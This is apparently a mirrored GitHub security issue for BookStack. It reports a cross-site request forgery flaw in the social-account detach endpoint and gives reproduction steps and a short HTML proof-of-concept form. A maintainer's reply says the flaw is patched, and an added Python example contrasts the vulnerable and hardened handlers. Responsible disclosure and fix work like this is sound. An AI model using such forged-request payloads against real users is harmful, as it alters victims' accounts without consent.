Cross Site Request Forgery To Disconnect Social Accounts #2294

Closed
opened 2026-02-05 03:35:18 +03:00 by OVERLORD · 1 comment

Originally created by @bishal0x01 on GitHub (Jun 14, 2021).

Hello team,

I noticed that the "Disconnect Social Accounts" request is sent with the HTTP GET method and does not generate a CSRF token.

Steps to reproduce:

  1. Log in to your BookStack account at https://bookstack.yoururl.com
  2. Now navigate to "Edit profile" or go to https://bookstack.yoururl.com/user/{id}
  3. Then click on https://bookstack.yoururl.com/login/service/google/detach, or save the following code as csrf.html and send it to another user.

```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://bookstack.yoururl.com/login/service/google/detach">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

  4. As you can see, the social account, i.e. Google, has been disconnected.

Impact: By sending a link it is possible to disconnect the user's Social Accounts.

Mitigation: The request should be sent via POST, or a CSRF token should be generated.

If you need information, please let me know.

Best regards,
Bishal

OVERLORD added the 🛠️ Enhancement🔒 Security labels 2026-02-05 03:35:18 +03:00

@ssddanbrown commented on GitHub (Jun 15, 2021):

Thanks @bishal0x01,
Not a major concern for this endpoint but probably should be a POST with CSRF as stated.
Now patched in 7d951b842c for the next patch release.
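To make the report and the fix concrete, here is an added example (not BookStack's code; the request model, handler names and `_token` field are assumptions) that models the detach endpoint both ways: the pre-fix handler acts on a bare GET, so the cross-site form in the PoC succeeds, while the post-fix handler requires POST plus a session-bound CSRF token the attacker's page cannot read.

```python
import hmac
import secrets
from dataclasses import dataclass, field

DETACH_PATH = "/login/service/google/detach"

# Constructed request model for this example; not BookStack's own classes.
@dataclass
class Request:
    method: str
    path: str
    form: dict = field(default_factory=dict)      # body fields the submitting page controls
    session: dict = field(default_factory=dict)   # victim's session, sent via cookies either way

def detach_vulnerable(req: Request, user: dict) -> bool:
    """Pre-fix behaviour from the report: any GET to the path detaches the account."""
    if req.method == "GET" and req.path == DETACH_PATH:
        user["social_accounts"].discard("google")
        return True
    return False

def detach_hardened(req: Request, user: dict) -> bool:
    """Post-fix behaviour stated in the thread: POST only, with a per-session CSRF token."""
    if req.method != "POST" or req.path != DETACH_PATH:
        return False  # the PoC's <form> defaults to GET, so it stops here
    expected = req.session.get("_token")
    submitted = req.form.get("_token", "")
    # A cross-origin page cannot read the token out of the victim's session or HTML,
    # so a forged POST arrives without it; compare_digest keeps the check constant-time.
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False
    user["social_accounts"].discard("google")
    return True

def own_form_request(session: dict) -> Request:
    """What the site's own detach form sends once it embeds the session token."""
    return Request("POST", DETACH_PATH, form={"_token": session["_token"]}, session=session)

def demo() -> dict:
    session = {"_token": secrets.token_hex(20)}       # constructed victim session
    forged_get = Request("GET", DETACH_PATH, session=session)        # the csrf.html submit
    forged_post = Request("POST", DETACH_PATH, session=session)      # same form with method=post
    users = [{"social_accounts": {"google"}} for _ in range(4)]
    return {
        "vulnerable_accepts_forged": detach_vulnerable(forged_get, users[0]),
        "hardened_rejects_forged_get": not detach_hardened(forged_get, users[1]),
        "hardened_rejects_forged_post": not detach_hardened(forged_post, users[2]),
        "hardened_accepts_own_form": detach_hardened(own_form_request(session), users[3]),
        "remaining": [sorted(u["social_accounts"]) for u in users],
    }
```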

Reference: starred/BookStack#2294